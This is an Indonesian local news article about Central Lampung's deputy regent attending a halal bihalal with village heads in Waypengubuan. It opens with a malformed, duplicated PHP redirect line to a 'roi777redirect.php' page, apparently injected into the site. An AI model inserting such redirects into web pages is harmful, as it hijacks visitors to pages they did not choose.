header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Wabup Lamteng Hadiri Halal Bihalal di Waypengubuan -
Wabup Lamteng Hadiri Halal Bihalal di Waypengubuan

TRANSLAMPUNG.COM-PEMERINTAH Kecamatan Waypengubuan menggelar halal bihalal dengan seluruh jajaran aparatur kampung yang ada di kecamatan setempat, Senin (2/7).

Bertempat di rumah Kepala Kampung Banjarratu, Hamidi, acara tersebut juga dihadiri Wakil Bupati Lampung Tengah (Lamteng), Loekman Djoyosoemarto.

Dari pantauan di lokasi acara, Loekman Djoyosoemarto hadir sekitar pukul 13.00 WIB. Kedatangan Wakil Bupati beserta jajarannya, disambut langsung oleh Camat Waypengubuan Dahrif Ansori beserta para kepala kampungnya.

Acara halal bihalal diikuti lebih dari 500 tamu undangan. Terdiri dari seluruh kepala kampung (kakam) se-Waypengubuan, Kepala UPTD Pertanian, Kepala UPTD Pendidikan, UPTD Puskesmas, perwakilan dari Polsek Waypengubuan, dan perwakilan dari Danramil 411-03/TB, Kepala Kampung Terbanggibesar, dan semua kepala kampong se-Kecamatan Seputihagung.

Kepala Kampung Banjarratu, Hamidi, mengucapkan terima kasih kepada Wakil Bupati atas kunjungannya tersebut.

Hamidi juga mengungkapkan, bahwa kedatangan Wakil Bupati ke Kecamatan Waypengubuan, dapat menjadi pemicu kepada semua kakam dan masyarakat Waypengubuan, untuk lebih giat dan semangat dalam membangun kampung.

“Kami ucapkan terima kasih kepada Wakil Bupati Lamteng Loekman Djoyosoemarto, yang mau hadir di acara halal bihalal ini. Dan kehadiran Wakil Bupati, tentunya menjadi penyemangat kami dalam membangun kampung kami. Dan saya harap, kedepannya beliau sering-sering mengunjungi kampung-kampung yang ada di Kecamatan Waypengubuan,” ujar Hamidi.

Sementara, Camat Waypengubuan Dahrif Ansori juga mengucapkan banyak terima kasih kepada Wakil Bupati Lamteng Loekman Djoyosoemarto, yang sudah menghadiri

undangannya tersebut.

“Saya atas nama masyarakat Waypengubuan, mengucapkan banyak terima kasih kepada Wakil Bupati, yang telah datang untuk memenuhi undangan kami. Selain itu, kami masyarakat Kecamatan Waypengubuan selalu bersatu dan kompak dalam mendukung semua kebijakan dari pemerintah daerah (pemda), siapapun itu pemimpinnya,” ujar Dahrif Ansori.

Dalam pidatonya, Loekman Djoyosoemarto mengapresiasi Kecamatan Waypengubuan, yang tetap solid dan kompak dalam mendukung semua kebijakan dari pemda.

“Saya ucapkan terima kasih kepada semua masyarakat Kecamatan Waypengubuan, yang selalu solid dan kompak dalam mendukung semua kebijakan yang dibuat Pemda Lamteng,” ujar Loekman.

Dia juga berpesan, agar semua kepala kampong menggunakan kucuran dana dari pemerintah, melalui Anggaran Danan Desa (ADD) dengan sebaik-baiknya.

“Gunakan dengan sebaik-baiknya kucuran dana yang sudah diberikan oleh pemerintah, untuk membangun kampung, agar kampung menjadi maju, tentram dan nyaman. Penggunaannya harus jelas dan transparan, karena tanpa kejelasan dari dana tersebut, sama juga bohong,” tambahnya.

Tak lupa, pihaknya mengingatkan, agar masyarakat selalu membangkitkan semangat dalam bergotong royong.

“Mari kita budayakan warisan nenek moyang kita, yaitu gotong royong. Karena dengan bergotong royong, semua kegiatan atau pekerjaan pasti hasilnya akan lebih baik,” tambahnya.

Selesai acara, Loekman Djoyosoemarto menyerahkan secara sombolis sertifikat tanah melalui PTSL, kepada masyarakat Kampung Banjarratu. Selain itu, penutup acara juga isi dengan tarian dari suku Bali yang ada di kampong tersebut, yaitu tari Cendrawasih dan tari Bumbung. Tak lupa pula, Loekman menyumbangkan sebuah lagu kesayangannya,

sebelum dirinya pulang. (adv)

News Reporter